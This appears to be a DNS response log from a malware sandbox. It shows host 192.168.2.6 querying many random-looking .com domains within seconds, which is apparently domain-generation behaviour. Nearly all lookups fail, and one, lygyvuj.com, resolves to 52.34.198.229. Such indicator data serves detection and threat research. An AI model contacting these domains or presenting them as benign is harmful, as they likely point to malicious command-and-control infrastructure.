Nov 11, 2024 18:13:19.724529982 CET	1.1.1.1	192.168.2.6	0xcd89	Name error (3)	vonyqym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.726557970 CET	1.1.1.1	192.168.2.6	0xd083	Name error (3)	pumywug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.736105919 CET	1.1.1.1	192.168.2.6	0x2d0a	Name error (3)	gacyhez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.736381054 CET	1.1.1.1	192.168.2.6	0xd282	Name error (3)	vocyjet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.736473083 CET	1.1.1.1	192.168.2.6	0xfcdf	Name error (3)	lysyxar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.736754894 CET	1.1.1.1	192.168.2.6	0x5747	Name error (3)	puvyjyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.739237070 CET	1.1.1.1	192.168.2.6	0x7e62	Name error (3)	pufycyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.915716887 CET	1.1.1.1	192.168.2.6	0xb45f	No error (0)	lygyvuj.com		52.34.198.229	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.628607988 CET	1.1.1.1	192.168.2.6	0xf79b	Name error (3)	qeqykyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.629441023 CET	1.1.1.1	192.168.2.6	0x895a	Name error (3)	puzybil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.631176949 CET	1.1.1.1	192.168.2.6	0xa8aa	Name error (3)	vofypam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.636210918 CET	1.1.1.1	192.168.2.6	0x275f	Name error (3)	qedytoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.644521952 CET	1.1.1.1	192.168.2.6	0x34d9	Name error (3)	lymyjyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.647402048 CET	1.1.1.1	192.168.2.6	0x1c32	Name error (3)	pufyxov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.649672031 CET	1.1.1.1	192.168.2.6	0xe26b	Name error (3)	gatyruw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.652761936 CET	1.1.1.1	192.168.2.6	0x72ba	Name error (3)	volybut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.652892113 CET	1.1.1.1	192.168.2.6	0x4a8d	Name error (3)	ganyhab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.658910990 CET	1.1.1.1	192.168.2.6	0x1ccd	Name error (3)	qexyfuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.662765980 CET	1.1.1.1	192.168.2.6	0xbcd9	Name error (3)	pujycyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.668382883 CET	1.1.1.1	192.168.2.6	0xf936	Name error (3)	qebyhag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.675462961 CET	1.1.1.1	192.168.2.6	0x5a55	Name error (3)	lysytoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.681890965 CET	1.1.1.1	192.168.2.6	0x1c77	Name error (3)	pupytiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.684271097 CET	1.1.1.1	192.168.2.6	0xf82d	Name error (3)	qekyvup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.686289072 CET	1.1.1.1	192.168.2.6	0xbce5	Name error (3)	lykyvyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.686477900 CET	1.1.1.1	192.168.2.6	0xac35	Name error (3)	lyxynir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.690109968 CET	1.1.1.1	192.168.2.6	0x5b99	Name error (3)	lyvygon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.690989971 CET	1.1.1.1	192.168.2.6	0x145e	Name error (3)	qetyrul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.694351912 CET	1.1.1.1	192.168.2.6	0x152d	Name error (3)	puvygog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.696156025 CET	1.1.1.1	192.168.2.6	0xf2f2	Name error (3)	vocygim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.696902990 CET	1.1.1.1	192.168.2.6	0x9f93	Name error (3)	puryjeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.697932959 CET	1.1.1.1	192.168.2.6	0x432c	Name error (3)	vocybuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.703892946 CET	1.1.1.1	192.168.2.6	0x3bf9	Name error (3)	pumyjev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.704049110 CET	1.1.1.1	192.168.2.6	0x3ddb	Name error (3)	galyvuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.704356909 CET	1.1.1.1	192.168.2.6	0xb913	Name error (3)	vopyrik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.704488039 CET	1.1.1.1	192.168.2.6	0x4c6f	Name error (3)	vowyqyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.708496094 CET	1.1.1.1	192.168.2.6	0x1ca2	Name error (3)	lyrywur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.708710909 CET	1.1.1.1	192.168.2.6	0x6fb7	Name error (3)	lygyxad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.709572077 CET	1.1.1.1	192.168.2.6	0x9eb3	Name error (3)	qegytop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.712023973 CET	1.1.1.1	192.168.2.6	0x9d2d	Name error (3)	gacyfih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.712946892 CET	1.1.1.1	192.168.2.6	0xefd6	Name error (3)	gahyces.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.713071108 CET	1.1.1.1	192.168.2.6	0x8297	Name error (3)	purywyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.714345932 CET	1.1.1.1	192.168.2.6	0xea1c	Name error (3)	qegyxav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.722559929 CET	1.1.1.1	192.168.2.6	0xf751	Name error (3)	gadypah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.724714041 CET	1.1.1.1	192.168.2.6	0x39a7	Name error (3)	gaqyqez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.726983070 CET	1.1.1.1	192.168.2.6	0x67f6	Name error (3)	lyxyfuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.727516890 CET	1.1.1.1	192.168.2.6	0x2ed9	Name error (3)	qetykyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.728080988 CET	1.1.1.1	192.168.2.6	0x9df9	Name error (3)	vonyjef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.730019093 CET	1.1.1.1	192.168.2.6	0xb5d7	Name error (3)	vojycec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.730751038 CET	1.1.1.1	192.168.2.6	0x31e8	Name error (3)	qebyniv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.731642962 CET	1.1.1.1	192.168.2.6	0xed93	Name error (3)	vojypat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.732678890 CET	1.1.1.1	192.168.2.6	0xf25f	Name error (3)	gahypoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.733674049 CET	1.1.1.1	192.168.2.6	0x3d83	Name error (3)	lyryjej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.733778954 CET	1.1.1.1	192.168.2.6	0x8eef	Name error (3)	pujypal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.735491991 CET	1.1.1.1	192.168.2.6	0xb83c	Name error (3)	lyvynid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.738938093 CET	1.1.1.1	192.168.2.6	0xd8f9	Name error (3)	lykyser.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.748228073 CET	1.1.1.1	192.168.2.6	0xcbc9	Name error (3)	gatykyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.754780054 CET	1.1.1.1	192.168.2.6	0x8ec4	Name error (3)	qedylig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.755729914 CET	1.1.1.1	192.168.2.6	0x17ab	Name error (3)	ganynos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.762075901 CET	1.1.1.1	192.168.2.6	0xa88e	Name error (3)	vofyzof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.798607111 CET	1.1.1.1	192.168.2.6	0x3ae0	Name error (3)	puvybuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.807254076 CET	1.1.1.1	192.168.2.6	0xf5c8	Name error (3)	qeqyqep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.807320118 CET	1.1.1.1	192.168.2.6	0x5d0c	Name error (3)	lymymax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.814115047 CET	1.1.1.1	192.168.2.6	0x7a7e	Name error (3)	volydyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.814156055 CET	1.1.1.1	192.168.2.6	0x2bcd	Name error (3)	vopykum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.814173937 CET	1.1.1.1	192.168.2.6	0xafd	Name error (3)	gadyzib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.814364910 CET	1.1.1.1	192.168.2.6	0xfb9b	Name error (3)	lysylun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.818027020 CET	1.1.1.1	192.168.2.6	0xa87c	Name error (3)	pumymap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.822894096 CET	1.1.1.1	192.168.2.6	0xf29b	Name error (3)	galydyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.824137926 CET	1.1.1.1	192.168.2.6	0xbf4	Name error (3)	puzyduq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.827239990 CET	1.1.1.1	192.168.2.6	0x183	Name error (3)	vonymoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.837289095 CET	1.1.1.1	192.168.2.6	0x585f	Name error (3)	qekysel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.839277983 CET	1.1.1.1	192.168.2.6	0x3b3a	Name error (3)	pupylug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.900305033 CET	1.1.1.1	192.168.2.6	0x47c8	Name error (3)	lyvyver.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.914740086 CET	1.1.1.1	192.168.2.6	0x37a2	Name error (3)	lykytin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.920259953 CET	1.1.1.1	192.168.2.6	0x96e2	Name error (3)	vopyjac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.921715975 CET	1.1.1.1	192.168.2.6	0x8c9c	Name error (3)	gatyhos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.924056053 CET	1.1.1.1	192.168.2.6	0xc70a	Name error (3)	qetyhov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.940082073 CET	1.1.1.1	192.168.2.6	0x8c6	Name error (3)	qekytig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.948821068 CET	1.1.1.1	192.168.2.6	0xc829	Name error (3)	vonybuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.955271006 CET	1.1.1.1	192.168.2.6	0x22cf	Name error (3)	ganyvyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.959754944 CET	1.1.1.1	192.168.2.6	0x9603	Name error (3)	volycem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.960414886 CET	1.1.1.1	192.168.2.6	0xb4db	Name error (3)	gaqyhaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.961258888 CET	1.1.1.1	192.168.2.6	0x8c39	Name error (3)	pupyjap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.967346907 CET	1.1.1.1	192.168.2.6	0xe3e8	Name error (3)	purymog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.968791008 CET	1.1.1.1	192.168.2.6	0x7a54	Name error (3)	vojyzik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.969842911 CET	1.1.1.1	192.168.2.6	0x24bd	Name error (3)	qebyvyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.970849037 CET	1.1.1.1	192.168.2.6	0x41e7	Name error (3)	vopyqef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.971854925 CET	1.1.1.1	192.168.2.6	0x94ea	Name error (3)	lygylur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.972449064 CET	1.1.1.1	192.168.2.6	0x660c	Name error (3)	qekyxaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.975878000 CET	1.1.1.1	192.168.2.6	0x882c	Name error (3)	puvydyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.978838921 CET	1.1.1.1	192.168.2.6	0x33eb	Name error (3)	qebyfup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.980272055 CET	1.1.1.1	192.168.2.6	0x41cd	Name error (3)	pupywyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.983407974 CET	1.1.1.1	192.168.2.6	0x7e38	Name error (3)	lymygor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.984894991 CET	1.1.1.1	192.168.2.6	0x9163	Name error (3)	puzyceg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.993247986 CET	1.1.1.1	192.168.2.6	0x8220	Name error (3)	vofyruc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.996054888 CET	1.1.1.1	192.168.2.6	0xe359	Name error (3)	galycah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.996068001 CET	1.1.1.1	192.168.2.6	0x2029	Name error (3)	gahyziw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.996079922 CET	1.1.1.1	192.168.2.6	0xae51	Name error (3)	qedyruv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.997947931 CET	1.1.1.1	192.168.2.6	0xdd5a	Name error (3)	ganyfuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.012583971 CET	1.1.1.1	192.168.2.6	0xfe7d	Name error (3)	lygytix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.013307095 CET	1.1.1.1	192.168.2.6	0x38f2	Name error (3)	gacyvub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.013318062 CET	1.1.1.1	192.168.2.6	0x8255	Name error (3)	gadykyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.013859987 CET	1.1.1.1	192.168.2.6	0x8c89	Name error (3)	lyvyfux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.013907909 CET	1.1.1.1	192.168.2.6	0x58a9	Name error (3)	qexyvyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.014342070 CET	1.1.1.1	192.168.2.6	0xc131	Name error (3)	pufytip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.016957998 CET	1.1.1.1	192.168.2.6	0x225f	Name error (3)	qegylul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.019013882 CET	1.1.1.1	192.168.2.6	0x35e8	Name error (3)	qexysev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.019937038 CET	1.1.1.1	192.168.2.6	0xbf07	Name error (3)	lysyjex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.021675110 CET	1.1.1.1	192.168.2.6	0xfb93	Name error (3)	pujyxoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.023207903 CET	1.1.1.1	192.168.2.6	0xd2ca	Name error (3)	vowyjak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.032697916 CET	1.1.1.1	192.168.2.6	0xa867	Name error (3)	vocydyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.038153887 CET	1.1.1.1	192.168.2.6	0xebd	Name error (3)	pujytug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.039237022 CET	1.1.1.1	192.168.2.6	0x1e2e	Name error (3)	lymynuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.040018082 CET	1.1.1.1	192.168.2.6	0xe29b	Name error (3)	gacydes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.040457010 CET	1.1.1.1	192.168.2.6	0x1295	Name error (3)	vowymom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.040817976 CET	1.1.1.1	192.168.2.6	0xfb88	Name error (3)	vonygit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.041366100 CET	1.1.1.1	192.168.2.6	0xbf22	Name error (3)	qetyqag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.041847944 CET	1.1.1.1	192.168.2.6	0xcfea	Name error (3)	lyxysad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.042042971 CET	1.1.1.1	192.168.2.6	0x5546	Name error (3)	volypof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.043171883 CET	1.1.1.1	192.168.2.6	0x817c	Name error (3)	vofykyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.045110941 CET	1.1.1.1	192.168.2.6	0xc9c7	Name error (3)	pumybuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.048280001 CET	1.1.1.1	192.168.2.6	0xc731	Name error (3)	qedykep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.052469015 CET	1.1.1.1	192.168.2.6	0x70	Name error (3)	qeqyhol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.052735090 CET	1.1.1.1	192.168.2.6	0xd2ba	Name error (3)	lyryman.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.054507971 CET	1.1.1.1	192.168.2.6	0x5cf2	Name error (3)	pumygil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.054932117 CET	1.1.1.1	192.168.2.6	0x1c13	Name error (3)	lykyxoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.060257912 CET	1.1.1.1	192.168.2.6	0xa5c4	Name error (3)	gaqynih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.062268972 CET	1.1.1.1	192.168.2.6	0x7c14	Name error (3)	gadyrus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.063232899 CET	1.1.1.1	192.168.2.6	0x3584	Name error (3)	gatyqeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.065525055 CET	1.1.1.1	192.168.2.6	0x23cd	Name error (3)	lyxyvyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.065660000 CET	1.1.1.1	192.168.2.6	0xa20e	Name error (3)	pufylul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.089909077 CET	1.1.1.1	192.168.2.6	0x9764	Name error (3)	lysywyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.089940071 CET	1.1.1.1	192.168.2.6	0x9d93	Name error (3)	galypob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.204912901 CET	1.1.1.1	192.168.2.6	0xd832	Name error (3)	vojyrum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.593717098 CET	1.1.1.1	192.168.2.6	0x6061	Name error (3)	vocycat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.594119072 CET	1.1.1.1	192.168.2.6	0xfce7	Name error (3)	lyrygid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.594841003 CET	1.1.1.1	192.168.2.6	0x84fc	Name error (3)	qegyryq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.595953941 CET	1.1.1.1	192.168.2.6	0xa96	Name error (3)	purygiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.597882986 CET	1.1.1.1	192.168.2.6	0xe1	Name error (3)	lysymor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.599559069 CET	1.1.1.1	192.168.2.6	0x7f7e	Name error (3)	puvycel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.599571943 CET	1.1.1.1	192.168.2.6	0x5244	Name error (3)	gatyniz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.600594997 CET	1.1.1.1	192.168.2.6	0x7033	Name error (3)	qekyryp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.600606918 CET	1.1.1.1	192.168.2.6	0xe600	Name error (3)	purybup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.603591919 CET	1.1.1.1	192.168.2.6	0x39bd	Name error (3)	qexytil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.603938103 CET	1.1.1.1	192.168.2.6	0x90ce	Name error (3)	lygyjan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.605036020 CET	1.1.1.1	192.168.2.6	0x8a9d	Name error (3)	gaqyvys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.607182026 CET	1.1.1.1	192.168.2.6	0x222	Name error (3)	pupyguq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.613725901 CET	1.1.1.1	192.168.2.6	0x7189	Name error (3)	vonydem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.615206003 CET	1.1.1.1	192.168.2.6	0x5bd3	Name error (3)	gahyruh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.615734100 CET	1.1.1.1	192.168.2.6	0x4786	Name error (3)	vofyjom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.616710901 CET	1.1.1.1	192.168.2.6	0x369b	Name error (3)	ganycob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.616724968 CET	1.1.1.1	192.168.2.6	0xd7b8	Name error (3)	qeqyvev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.617865086 CET	1.1.1.1	192.168.2.6	0x4065	Name error (3)	vowybyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.625124931 CET	1.1.1.1	192.168.2.6	0x4605	Name error (3)	lyxytur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.634761095 CET	1.1.1.1	192.168.2.6	0xe57a	Name error (3)	galyzus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.635279894 CET	1.1.1.1	192.168.2.6	0xe825	Name error (3)	qegykeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.635292053 CET	1.1.1.1	192.168.2.6	0x16bb	Name error (3)	lykywex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.636116982 CET	1.1.1.1	192.168.2.6	0x632f	Name error (3)	lyrynux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.638925076 CET	1.1.1.1	192.168.2.6	0xd8e1	Name error (3)	pufyjag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.642026901 CET	1.1.1.1	192.168.2.6	0xd36a	Name error (3)	vocypok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.718420982 CET	1.1.1.1	192.168.2.6	0xefb7	Name error (3)	qebysaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.718466997 CET	1.1.1.1	192.168.2.6	0xc37	Name error (3)	gadyhoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.719131947 CET	1.1.1.1	192.168.2.6	0xb42d	Name error (3)	ganydeh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.732160091 CET	1.1.1.1	192.168.2.6	0xd05	Name error (3)	vopymit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.737859011 CET	1.1.1.1	192.168.2.6	0x473a	Name error (3)	pupymol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.738944054 CET	1.1.1.1	192.168.2.6	0x6ed3	Name error (3)	lygywyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.739352942 CET	1.1.1.1	192.168.2.6	0xeeb4	Name error (3)	volyzic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.740890980 CET	1.1.1.1	192.168.2.6	0xab72	Name error (3)	gacypiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.740909100 CET	1.1.1.1	192.168.2.6	0xc881	Name error (3)	gahykeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.740984917 CET	1.1.1.1	192.168.2.6	0x548b	Name error (3)	qexyxop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.740997076 CET	1.1.1.1	192.168.2.6	0x7f6	Name error (3)	puzytul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.741472006 CET	1.1.1.1	192.168.2.6	0xc60f	Name error (3)	qeqyfug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.748507023 CET	1.1.1.1	192.168.2.6	0xe245	Name error (3)	gacycaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.750443935 CET	1.1.1.1	192.168.2.6	0x8bc3	Name error (3)	vofyqek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.750693083 CET	1.1.1.1	192.168.2.6	0x20e0	Name error (3)	pumydyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.750963926 CET	1.1.1.1	192.168.2.6	0xc56e	Name error (3)	vopyguk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.752737999 CET	1.1.1.1	192.168.2.6	0x67c0	Name error (3)	qekyluv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.756337881 CET	1.1.1.1	192.168.2.6	0x3ae7	Name error (3)	pujylyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.756525993 CET	1.1.1.1	192.168.2.6	0x16be	Name error (3)	qetynup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.756540060 CET	1.1.1.1	192.168.2.6	0x6ff2	Name error (3)	volyrut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.757477045 CET	1.1.1.1	192.168.2.6	0x8bf9	Name error (3)	lymyved.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.757631063 CET	1.1.1.1	192.168.2.6	0xc6da	Name error (3)	qedyhiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.758681059 CET	1.1.1.1	192.168.2.6	0x5bd7	Name error (3)	lykylud.com	none	none	A (IP address)	IN (0x0001)	false
